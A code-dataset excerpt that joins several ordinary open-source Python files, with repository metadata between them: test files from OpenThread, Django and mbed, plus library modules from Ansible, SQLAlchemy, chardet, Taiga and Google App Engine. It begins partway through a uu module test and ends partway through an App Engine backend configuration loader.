sys.stdout = cStringIO.StringIO()
uu.decode("-", "-")
self.assertEqual(sys.stdout.getvalue(), plaintext)
class UUFileTest(unittest.TestCase):
def _kill(self, f):
# close and remove file
try:
f.close()
except (SystemExit, KeyboardInterrupt):
raise
except:
pass
try:
os.unlink(f.name)
except (SystemExit, KeyboardInterrupt):
raise
except:
pass
def setUp(self):
self.tmpin = test_support.TESTFN + "i"
self.tmpout = test_support.TESTFN + "o"
def tearDown(self):
del self.tmpin
del self.tmpout
def test_encode(self):
fin = fout = None
try:
test_support.unlink(self.tmpin)
fin = open(self.tmpin, 'wb')
fin.write(plaintext)
fin.close()
fin = open(self.tmpin, 'rb')
fout = open(self.tmpout, 'w')
uu.encode(fin, fout, self.tmpin, mode=0644)
fin.close()
fout.close()
fout = open(self.tmpout, 'r')
s = fout.read()
fout.close()
self.assertEqual(s, encodedtextwrapped % (0644, self.tmpin))
# in_file and out_file as filenames
uu.encode(self.tmpin, self.tmpout, self.tmpin, mode=0644)
fout = open(self.tmpout, 'r')
s = fout.read()
fout.close()
self.assertEqual(s, encodedtextwrapped % (0644, self.tmpin))
finally:
self._kill(fin)
self._kill(fout)
def test_decode(self):
f = None
try:
test_support.unlink(self.tmpin)
f = open(self.tmpin, 'w')
f.write(encodedtextwrapped % (0644, self.tmpout))
f.close()
f = open(self.tmpin, 'r')
uu.decode(f)
f.close()
f = open(self.tmpout, 'r')
s = f.read()
f.close()
self.assertEqual(s, plaintext)
# XXX is there an xp way to verify the mode?
finally:
self._kill(f)
def test_decodetwice(self):
# Verify that decode() will refuse to overwrite an existing file
f = None
try:
f = cStringIO.StringIO(encodedtextwrapped % (0644, self.tmpout))
f = open(self.tmpin, 'r')
uu.decode(f)
f.close()
f = open(self.tmpin, 'r')
self.assertRaises(uu.Error, uu.decode, f)
f.close()
finally:
self._kill(f)
def test_main():
test_support.run_unittest(UUTest, UUStdIOTest, UUFileTest)
if __name__=="__main__":
test_main()
|
lgpl-2.1
|
abtink/openthread
|
tests/toranj/test-034-poor-link-parent-child-attach.py
|
9
|
3302
|
#!/usr/bin/env python3
#
# Copyright (c) 2019, The OpenThread Authors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import wpan
# -----------------------------------------------------------------------------------------------------------------------
# Test description:
#
# This test covers a situation where a single parent exists in network with poor link quality ensuring the child
# can attach the parent.
test_name = __file__[:-3] if __file__.endswith('.py') else __file__
print('-' * 120)
print('Starting \'{}\''.format(test_name))
# -----------------------------------------------------------------------------------------------------------------------
# Creating `wpan.Nodes` instances
speedup = 4
wpan.Node.set_time_speedup_factor(speedup)
parent = wpan.Node()
child = wpan.Node()
# -----------------------------------------------------------------------------------------------------------------------
# Init all nodes
wpan.Node.init_all_nodes()
# -----------------------------------------------------------------------------------------------------------------------
# Test implementation
parent.form("network")
# Create a poor link between child and parent using MAC fixed RSSI filter
parent.set(wpan.WPAN_MAC_FILTER_FIXED_RSSI, '-99')
parent.add(wpan.WPAN_MAC_FILTER_ENTRIES, child.get(wpan.WPAN_EXT_ADDRESS)[1:-1])
child.set(wpan.WPAN_MAC_FILTER_FIXED_RSSI, '-99')
child.add(wpan.WPAN_MAC_FILTER_ENTRIES, parent.get(wpan.WPAN_EXT_ADDRESS)[1:-1])
# Ensure child can still attach the single low-link quality parent
child.join_node(parent, node_type=wpan.JOIN_TYPE_END_DEVICE)
# -----------------------------------------------------------------------------------------------------------------------
# Test finished
wpan.Node.finalize_all_nodes()
print('\'{}\' passed.'.format(test_name))
|
bsd-3-clause
|
jotes/ansible
|
lib/ansible/runner/return_data.py
|
133
|
2102
|
# (c) 2012-2014, Michael DeHaan <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from ansible import utils
class ReturnData(object):
''' internal return class for runner execute methods, not part of public API signature '''
__slots__ = [ 'result', 'comm_ok', 'host', 'diff' ]
def __init__(self, conn=None, host=None, result=None,
comm_ok=True, diff=dict()):
# which host is this ReturnData about?
if conn is not None:
self.host = conn.host
delegate = getattr(conn, 'delegate', None)
if delegate is not None:
self.host = delegate
else:
self.host = host
self.result = result
self.comm_ok = comm_ok
# if these values are set and used with --diff we can show
# changes made to particular files
self.diff = diff
if type(self.result) in [ str, unicode ]:
self.result = utils.parse_json(self.result, from_remote=True, no_exceptions=True)
if self.host is None:
raise Exception("host not set")
if type(self.result) != dict:
raise Exception("dictionary result expected")
def communicated_ok(self):
return self.comm_ok
def is_successful(self):
return self.comm_ok and (self.result.get('failed', False) == False) and ('failed_when_result' in self.result and [not self.result['failed_when_result']] or [self.result.get('rc',0) == 0])[0]
|
gpl-3.0
|
brototyp/CouchPotato
|
library/sqlalchemy/dialects/mssql/mxodbc.py
|
18
|
3274
|
"""
Support for MS-SQL via mxODBC.
mxODBC is available at:
http://www.egenix.com/
This was tested with mxODBC 3.1.2 and the SQL Server Native
Client connected to MSSQL 2005 and 2008 Express Editions.
Connecting
~~~~~~~~~~
Connection is via DSN::
mssql+mxodbc://<username>:<password>@<dsnname>
Execution Modes
~~~~~~~~~~~~~~~
mxODBC features two styles of statement execution, using the
``cursor.execute()`` and ``cursor.executedirect()`` methods (the second being
an extension to the DBAPI specification). The former makes use of a particular
API call specific to the SQL Server Native Client ODBC driver known
SQLDescribeParam, while the latter does not.
mxODBC apparently only makes repeated use of a single prepared statement
when SQLDescribeParam is used. The advantage to prepared statement reuse is
one of performance. The disadvantage is that SQLDescribeParam has a limited
set of scenarios in which bind parameters are understood, including that they
cannot be placed within the argument lists of function calls, anywhere outside
the FROM, or even within subqueries within the FROM clause - making the usage
of bind parameters within SELECT statements impossible for all but the most
simplistic statements.
For this reason, the mxODBC dialect uses the "native" mode by default only for
INSERT, UPDATE, and DELETE statements, and uses the escaped string mode for
all other statements.
This behavior can be controlled via
:meth:`~sqlalchemy.sql.expression.Executable.execution_options` using the
``native_odbc_execute`` flag with a value of ``True`` or ``False``, where a
value of ``True`` will unconditionally use native bind parameters and a value
of ``False`` will uncondtionally use string-escaped parameters.
"""
import re
import sys
from sqlalchemy import types as sqltypes
from sqlalchemy import util
from sqlalchemy.connectors.mxodbc import MxODBCConnector
from sqlalchemy.dialects.mssql.pyodbc import MSExecutionContext_pyodbc
from sqlalchemy.dialects.mssql.base import (MSExecutionContext, MSDialect,
MSSQLCompiler,
MSSQLStrictCompiler,
_MSDateTime, _MSDate, TIME)
class MSExecutionContext_mxodbc(MSExecutionContext_pyodbc):
"""
The pyodbc execution context is useful for enabling
SELECT SCOPE_IDENTITY in cases where OUTPUT clause
does not work (tables with insert triggers).
"""
#todo - investigate whether the pyodbc execution context
# is really only being used in cases where OUTPUT
# won't work.
class MSDialect_mxodbc(MxODBCConnector, MSDialect):
# TODO: may want to use this only if FreeTDS is not in use,
# since FreeTDS doesn't seem to use native binds.
statement_compiler = MSSQLStrictCompiler
execution_ctx_cls = MSExecutionContext_mxodbc
colspecs = {
#sqltypes.Numeric : _MSNumeric,
sqltypes.DateTime : _MSDateTime,
sqltypes.Date : _MSDate,
sqltypes.Time : TIME,
}
def __init__(self, description_encoding='latin-1', **params):
super(MSDialect_mxodbc, self).__init__(**params)
self.description_encoding = description_encoding
dialect = MSDialect_mxodbc
|
gpl-3.0
|
jsirois/pex
|
pex/vendor/_vendored/pip/pip/_vendor/chardet/universaldetector.py
|
244
|
12485
|
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Universal charset detector code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 2001
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
# Shy Shalom - original C code
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
"""
Module containing the UniversalDetector detector class, which is the primary
class a user of ``chardet`` should use.
:author: Mark Pilgrim (initial port to Python)
:author: Shy Shalom (original C code)
:author: Dan Blanchard (major refactoring for 3.0)
:author: Ian Cordasco
"""
import codecs
import logging
import re
from .charsetgroupprober import CharSetGroupProber
from .enums import InputState, LanguageFilter, ProbingState
from .escprober import EscCharSetProber
from .latin1prober import Latin1Prober
from .mbcsgroupprober import MBCSGroupProber
from .sbcsgroupprober import SBCSGroupProber
class UniversalDetector(object):
"""
The ``UniversalDetector`` class underlies the ``chardet.detect`` function
and coordinates all of the different charset probers.
To get a ``dict`` containing an encoding and its confidence, you can simply
run:
.. code::
u = UniversalDetector()
u.feed(some_bytes)
u.close()
detected = u.result
"""
MINIMUM_THRESHOLD = 0.20
HIGH_BYTE_DETECTOR = re.compile(b'[\x80-\xFF]')
ESC_DETECTOR = re.compile(b'(\033|~{)')
WIN_BYTE_DETECTOR = re.compile(b'[\x80-\x9F]')
ISO_WIN_MAP = {'iso-8859-1': 'Windows-1252',
'iso-8859-2': 'Windows-1250',
'iso-8859-5': 'Windows-1251',
'iso-8859-6': 'Windows-1256',
'iso-8859-7': 'Windows-1253',
'iso-8859-8': 'Windows-1255',
'iso-8859-9': 'Windows-1254',
'iso-8859-13': 'Windows-1257'}
def __init__(self, lang_filter=LanguageFilter.ALL):
self._esc_charset_prober = None
self._charset_probers = []
self.result = None
self.done = None
self._got_data = None
self._input_state = None
self._last_char = None
self.lang_filter = lang_filter
self.logger = logging.getLogger(__name__)
self._has_win_bytes = None
self.reset()
def reset(self):
"""
Reset the UniversalDetector and all of its probers back to their
initial states. This is called by ``__init__``, so you only need to
call this directly in between analyses of different documents.
"""
self.result = {'encoding': None, 'confidence': 0.0, 'language': None}
self.done = False
self._got_data = False
self._has_win_bytes = False
self._input_state = InputState.PURE_ASCII
self._last_char = b''
if self._esc_charset_prober:
self._esc_charset_prober.reset()
for prober in self._charset_probers:
prober.reset()
def feed(self, byte_str):
"""
Takes a chunk of a document and feeds it through all of the relevant
charset probers.
After calling ``feed``, you can check the value of the ``done``
attribute to see if you need to continue feeding the
``UniversalDetector`` more data, or if it has made a prediction
(in the ``result`` attribute).
.. note::
You should always call ``close`` when you're done feeding in your
document if ``done`` is not already ``True``.
"""
if self.done:
return
if not len(byte_str):
return
if not isinstance(byte_str, bytearray):
byte_str = bytearray(byte_str)
# First check for known BOMs, since these are guaranteed to be correct
if not self._got_data:
# If the data starts with BOM, we know it is UTF
if byte_str.startswith(codecs.BOM_UTF8):
# EF BB BF UTF-8 with BOM
self.result = {'encoding': "UTF-8-SIG",
'confidence': 1.0,
'language': ''}
elif byte_str.startswith((codecs.BOM_UTF32_LE,
codecs.BOM_UTF32_BE)):
# FF FE 00 00 UTF-32, little-endian BOM
# 00 00 FE FF UTF-32, big-endian BOM
self.result = {'encoding': "UTF-32",
'confidence': 1.0,
'language': ''}
elif byte_str.startswith(b'\xFE\xFF\x00\x00'):
# FE FF 00 00 UCS-4, unusual octet order BOM (3412)
self.result = {'encoding': "X-ISO-10646-UCS-4-3412",
'confidence': 1.0,
'language': ''}
elif byte_str.startswith(b'\x00\x00\xFF\xFE'):
# 00 00 FF FE UCS-4, unusual octet order BOM (2143)
self.result = {'encoding': "X-ISO-10646-UCS-4-2143",
'confidence': 1.0,
'language': ''}
elif byte_str.startswith((codecs.BOM_LE, codecs.BOM_BE)):
# FF FE UTF-16, little endian BOM
# FE FF UTF-16, big endian BOM
self.result = {'encoding': "UTF-16",
'confidence': 1.0,
'language': ''}
self._got_data = True
if self.result['encoding'] is not None:
self.done = True
return
# If none of those matched and we've only see ASCII so far, check
# for high bytes and escape sequences
if self._input_state == InputState.PURE_ASCII:
if self.HIGH_BYTE_DETECTOR.search(byte_str):
self._input_state = InputState.HIGH_BYTE
elif self._input_state == InputState.PURE_ASCII and \
self.ESC_DETECTOR.search(self._last_char + byte_str):
self._input_state = InputState.ESC_ASCII
self._last_char = byte_str[-1:]
# If we've seen escape sequences, use the EscCharSetProber, which
# uses a simple state machine to check for known escape sequences in
# HZ and ISO-2022 encodings, since those are the only encodings that
# use such sequences.
if self._input_state == InputState.ESC_ASCII:
if not self._esc_charset_prober:
self._esc_charset_prober = EscCharSetProber(self.lang_filter)
if self._esc_charset_prober.feed(byte_str) == ProbingState.FOUND_IT:
self.result = {'encoding':
self._esc_charset_prober.charset_name,
'confidence':
self._esc_charset_prober.get_confidence(),
'language':
self._esc_charset_prober.language}
self.done = True
# If we've seen high bytes (i.e., those with values greater than 127),
# we need to do more complicated checks using all our multi-byte and
# single-byte probers that are left. The single-byte probers
# use character bigram distributions to determine the encoding, whereas
# the multi-byte probers use a combination of character unigram and
# bigram distributions.
elif self._input_state == InputState.HIGH_BYTE:
if not self._charset_probers:
self._charset_probers = [MBCSGroupProber(self.lang_filter)]
# If we're checking non-CJK encodings, use single-byte prober
if self.lang_filter & LanguageFilter.NON_CJK:
self._charset_probers.append(SBCSGroupProber())
self._charset_probers.append(Latin1Prober())
for prober in self._charset_probers:
if prober.feed(byte_str) == ProbingState.FOUND_IT:
self.result = {'encoding': prober.charset_name,
'confidence': prober.get_confidence(),
'language': prober.language}
self.done = True
break
if self.WIN_BYTE_DETECTOR.search(byte_str):
self._has_win_bytes = True
def close(self):
"""
Stop analyzing the current document and come up with a final
prediction.
:returns: The ``result`` attribute, a ``dict`` with the keys
`encoding`, `confidence`, and `language`.
"""
# Don't bother with checks if we're already done
if self.done:
return self.result
self.done = True
if not self._got_data:
self.logger.debug('no data received!')
# Default to ASCII if it is all we've seen so far
elif self._input_state == InputState.PURE_ASCII:
self.result = {'encoding': 'ascii',
'confidence': 1.0,
'language': ''}
# If we have seen non-ASCII, return the best that met MINIMUM_THRESHOLD
elif self._input_state == InputState.HIGH_BYTE:
prober_confidence = None
max_prober_confidence = 0.0
max_prober = None
for prober in self._charset_probers:
if not prober:
continue
prober_confidence = prober.get_confidence()
if prober_confidence > max_prober_confidence:
max_prober_confidence = prober_confidence
max_prober = prober
if max_prober and (max_prober_confidence > self.MINIMUM_THRESHOLD):
charset_name = max_prober.charset_name
lower_charset_name = max_prober.charset_name.lower()
confidence = max_prober.get_confidence()
# Use Windows encoding name instead of ISO-8859 if we saw any
# extra Windows-specific bytes
if lower_charset_name.startswith('iso-8859'):
if self._has_win_bytes:
charset_name = self.ISO_WIN_MAP.get(lower_charset_name,
charset_name)
self.result = {'encoding': charset_name,
'confidence': confidence,
'language': max_prober.language}
# Log all prober confidences if none met MINIMUM_THRESHOLD
if self.logger.getEffectiveLevel() == logging.DEBUG:
if self.result['encoding'] is None:
self.logger.debug('no probers hit minimum threshold')
for group_prober in self._charset_probers:
if not group_prober:
continue
if isinstance(group_prober, CharSetGroupProber):
for prober in group_prober.probers:
self.logger.debug('%s %s confidence = %s',
prober.charset_name,
prober.language,
prober.get_confidence())
else:
self.logger.debug('%s %s confidence = %s',
prober.charset_name,
prober.language,
prober.get_confidence())
return self.result
|
apache-2.0
|
erkanay/django
|
tests/null_fk_ordering/tests.py
|
44
|
2014
|
from __future__ import unicode_literals
from django.test import TestCase
from .models import Author, Article, SystemInfo, Forum, Post, Comment
class NullFkOrderingTests(TestCase):
def test_ordering_across_null_fk(self):
"""
Regression test for #7512
ordering across nullable Foreign Keys shouldn't exclude results
"""
author_1 = Author.objects.create(name='Tom Jones')
author_2 = Author.objects.create(name='Bob Smith')
Article.objects.create(title='No author on this article')
Article.objects.create(author=author_1, title='This article written by Tom Jones')
Article.objects.create(author=author_2, title='This article written by Bob Smith')
# We can't compare results directly (since different databases sort NULLs to
# different ends of the ordering), but we can check that all results are
# returned.
self.assertTrue(len(list(Article.objects.all())) == 3)
s = SystemInfo.objects.create(system_name='System Info')
f = Forum.objects.create(system_info=s, forum_name='First forum')
p = Post.objects.create(forum=f, title='First Post')
Comment.objects.create(post=p, comment_text='My first comment')
Comment.objects.create(comment_text='My second comment')
s2 = SystemInfo.objects.create(system_name='More System Info')
f2 = Forum.objects.create(system_info=s2, forum_name='Second forum')
p2 = Post.objects.create(forum=f2, title='Second Post')
Comment.objects.create(comment_text='Another first comment')
Comment.objects.create(post=p2, comment_text='Another second comment')
# We have to test this carefully. Some databases sort NULL values before
# everything else, some sort them afterwards. So we extract the ordered list
# and check the length. Before the fix, this list was too short (some values
# were omitted).
self.assertTrue(len(list(Comment.objects.all())) == 4)
|
bsd-3-clause
|
radhika-raghavendran/mbed-os5.1-onsemi
|
tools/host_tests/wait_us_auto.py
|
122
|
2871
|
"""
mbed SDK
Copyright (c) 2011-2013 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from time import time
class WaitusTest():
""" This test is reading single characters from stdio
and measures time between their occurrences.
"""
TICK_LOOP_COUNTER = 13
TICK_LOOP_SUCCESSFUL_COUNTS = 10
DEVIATION = 0.10 # +/-10%
def test(self, selftest):
test_result = True
# First character to start test (to know after reset when test starts)
if selftest.mbed.set_serial_timeout(None) is None:
return selftest.RESULT_IO_SERIAL
c = selftest.mbed.serial_read(1)
if c is None:
return selftest.RESULT_IO_SERIAL
if c == '$': # target will printout TargetID e.g.: $$$$1040e649d5c09a09a3f6bc568adef61375c6
#Read additional 39 bytes of TargetID
if selftest.mbed.serial_read(39) is None:
return selftest.RESULT_IO_SERIAL
c = selftest.mbed.serial_read(1) # Re-read first 'tick'
if c is None:
return selftest.RESULT_IO_SERIAL
start_serial_pool = time()
start = time()
success_counter = 0
for i in range(0, self.TICK_LOOP_COUNTER):
c = selftest.mbed.serial_read(1)
if c is None:
return selftest.RESULT_IO_SERIAL
delta = time() - start
deviation = abs(delta - 1)
# Round values
delta = round(delta, 2)
deviation = round(deviation, 2)
# Check if time measurements are in given range
deviation_ok = True if delta > 0 and deviation <= self.DEVIATION else False
success_counter = success_counter+1 if deviation_ok else 0
msg = "OK" if deviation_ok else "FAIL"
selftest.notify("%s in %.2f sec (%.2f) [%s]"% (c, delta, deviation, msg))
start = time()
if success_counter >= self.TICK_LOOP_SUCCESSFUL_COUNTS:
break
measurement_time = time() - start_serial_pool
selftest.notify("Consecutive OK timer reads: %d"% success_counter)
selftest.notify("Completed in %.2f sec" % (measurement_time))
test_result = True if success_counter >= self.TICK_LOOP_SUCCESSFUL_COUNTS else False
return selftest.RESULT_SUCCESS if test_result else selftest.RESULT_FAILURE
|
apache-2.0
|
xdevelsistemas/taiga-back-community
|
taiga/base/api/utils/formatting.py
|
2
|
4697
|
# -*- coding: utf-8 -*-
# Copyright (C) 2014-2016 Andrey Antukh <[email protected]>
# Copyright (C) 2014-2016 Jesús Espino <[email protected]>
# Copyright (C) 2014-2016 David Barragán <[email protected]>
# Copyright (C) 2014-2016 Alejandro Alonso <[email protected]>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# The code is partially taken (and modified) from django rest framework
# that is licensed under the following terms:
#
# Copyright (c) 2011-2014, Tom Christie
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# Redistributions in binary form must reproduce the above copyright notice, this
# list of conditions and the following disclaimer in the documentation and/or
# other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
Utility functions to return a formatted name and description for a given view.
"""
from django.utils.html import escape
from django.utils.safestring import mark_safe
from taiga.base.api.settings import api_settings
from textwrap import dedent
import re
# Markdown is optional
try:
import markdown
def apply_markdown(text):
"""
Simple wrapper around :func:`markdown.markdown` to set the base level
of '#' style headers to <h2>.
"""
extensions = ["headerid(level=2)"]
safe_mode = False
md = markdown.Markdown(extensions=extensions, safe_mode=safe_mode)
return md.convert(text)
except ImportError:
apply_markdown = None
def remove_trailing_string(content, trailing):
"""
Strip trailing component `trailing` from `content` if it exists.
Used when generating names from view classes.
"""
if content.endswith(trailing) and content != trailing:
return content[:-len(trailing)]
return content
def dedent(content):
"""
Remove leading indent from a block of text.
Used when generating descriptions from docstrings.
Note that python's `textwrap.dedent` doesn't quite cut it,
as it fails to dedent multiline docstrings that include
unindented text on the initial line.
"""
whitespace_counts = [len(line) - len(line.lstrip(" "))
for line in content.splitlines()[1:] if line.lstrip()]
# unindent the content if needed
if whitespace_counts:
whitespace_pattern = "^" + (" " * min(whitespace_counts))
content = re.sub(re.compile(whitespace_pattern, re.MULTILINE), "", content)
return content.strip()
def camelcase_to_spaces(content):
"""
Translate 'CamelCaseNames' to 'Camel Case Names'.
Used when generating names from view classes.
"""
camelcase_boundry = "(((?<=[a-z])[A-Z])|([A-Z](?![A-Z]|$)))"
content = re.sub(camelcase_boundry, " \\1", content).strip()
return " ".join(content.split("_")).title()
def markup_description(description):
"""
Apply HTML markup to the given description.
"""
if apply_markdown:
description = apply_markdown(description)
else:
description = escape(description).replace("\n", "<br />")
return mark_safe(description)
|
agpl-3.0
|
wangyou/XX-Net
|
code/default/gae_proxy/server/lib/google/appengine/api/backendinfo.py
|
14
|
6551
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
A library for working with BackendInfoExternal records, describing backends
configured for an application. Supports loading the records from backend.yaml.
"""
import os
import yaml
from yaml import representer
if os.environ.get('APPENGINE_RUNTIME') == 'python27':
from google.appengine.api import validation
from google.appengine.api import yaml_builder
from google.appengine.api import yaml_listener
from google.appengine.api import yaml_object
else:
from google.appengine.api import validation
from google.appengine.api import yaml_builder
from google.appengine.api import yaml_listener
from google.appengine.api import yaml_object
NAME_REGEX = r'(?!-)[a-z\d\-]{1,100}'
FILE_REGEX = r'(?!\^).*(?!\$).{1,256}'
CLASS_REGEX = r'^[bB](1|2|4|8|4_1G)$'
OPTIONS_REGEX = r'^[a-z, ]*$'
STATE_REGEX = r'^(START|STOP|DISABLED)$'
BACKENDS = 'backends'
NAME = 'name'
CLASS = 'class'
INSTANCES = 'instances'
OPTIONS = 'options'
PUBLIC = 'public'
DYNAMIC = 'dynamic'
FAILFAST = 'failfast'
MAX_CONCURRENT_REQUESTS = 'max_concurrent_requests'
START = 'start'
VALID_OPTIONS = frozenset([PUBLIC, DYNAMIC, FAILFAST])
STATE = 'state'
class BadConfig(Exception):
"""An invalid configuration was provided."""
class ListWithoutSort(list):
def sort(self):
pass
class SortedDict(dict):
def __init__(self, keys, data):
super(SortedDict, self).__init__()
self.keys = keys
self.update(data)
def items(self):
result = ListWithoutSort()
for key in self.keys:
if type(self.get(key)) != type(None):
result.append((key, self.get(key)))
return result
representer.SafeRepresenter.add_representer(
SortedDict, representer.SafeRepresenter.represent_dict)
class BackendEntry(validation.Validated):
"""A backend entry describes a single backend."""
ATTRIBUTES = {
NAME: NAME_REGEX,
CLASS: validation.Optional(CLASS_REGEX),
INSTANCES: validation.Optional(validation.TYPE_INT),
MAX_CONCURRENT_REQUESTS: validation.Optional(validation.TYPE_INT),
OPTIONS: validation.Optional(OPTIONS_REGEX),
PUBLIC: validation.Optional(validation.TYPE_BOOL),
DYNAMIC: validation.Optional(validation.TYPE_BOOL),
FAILFAST: validation.Optional(validation.TYPE_BOOL),
START: validation.Optional(FILE_REGEX),
STATE: validation.Optional(STATE_REGEX),
}
def __init__(self, *args, **kwargs):
super(BackendEntry, self).__init__(*args, **kwargs)
self.Init()
def Init(self):
if self.public:
raise BadConfig("Illegal field: 'public'")
if self.dynamic:
raise BadConfig("Illegal field: 'dynamic'")
if self.failfast:
raise BadConfig("Illegal field: 'failfast'")
self.ParseOptions()
return self
def set_class(self, Class):
"""Setter for 'class', since an attribute reference is an error."""
self.Set(CLASS, Class)
def get_class(self):
"""Accessor for 'class', since an attribute reference is an error."""
return self.Get(CLASS)
def ToDict(self):
"""Returns a sorted dictionary representing the backend entry."""
self.ParseOptions().WriteOptions()
result = super(BackendEntry, self).ToDict()
return SortedDict([NAME,
CLASS,
INSTANCES,
START,
OPTIONS,
MAX_CONCURRENT_REQUESTS,
STATE],
result)
def ParseOptions(self):
"""Parses the 'options' field and sets appropriate fields."""
if self.options:
options = [option.strip() for option in self.options.split(',')]
else:
options = []
for option in options:
if option not in VALID_OPTIONS:
raise BadConfig('Unrecognized option: %s', option)
self.public = PUBLIC in options
self.dynamic = DYNAMIC in options
self.failfast = FAILFAST in options
return self
def WriteOptions(self):
"""Writes the 'options' field based on other settings."""
options = []
if self.public:
options.append('public')
if self.dynamic:
options.append('dynamic')
if self.failfast:
options.append('failfast')
if options:
self.options = ', '.join(options)
else:
self.options = None
return self
def LoadBackendEntry(backend_entry):
"""Parses a BackendEntry object from a string.
Args:
backend_entry: a backend entry, as a string
Returns:
A BackendEntry object.
"""
builder = yaml_object.ObjectBuilder(BackendEntry)
handler = yaml_builder.BuilderHandler(builder)
listener = yaml_listener.EventListener(handler)
listener.Parse(backend_entry)
entries = handler.GetResults()
if len(entries) < 1:
raise BadConfig('Empty backend configuration.')
if len(entries) > 1:
raise BadConfig('Multiple backend entries were found in configuration.')
return entries[0].Init()
class BackendInfoExternal(validation.Validated):
"""BackendInfoExternal describes all backend entries for an application."""
ATTRIBUTES = {
BACKENDS: validation.Optional(validation.Repeated(BackendEntry)),
}
def LoadBackendInfo(backend_info, open_fn=None):
"""Parses a BackendInfoExternal object from a string.
Args:
backend_info: a backends stanza (list of backends) as a string
open_fn: Function for opening files. Unused.
Returns:
A BackendInfoExternal object.
"""
builder = yaml_object.ObjectBuilder(BackendInfoExternal)
handler = yaml_builder.BuilderHandler(builder)
listener = yaml_listener.EventListener(handler)
listener.Parse(backend_info)
backend_info = handler.GetResults()
if len(backend_info) < 1:
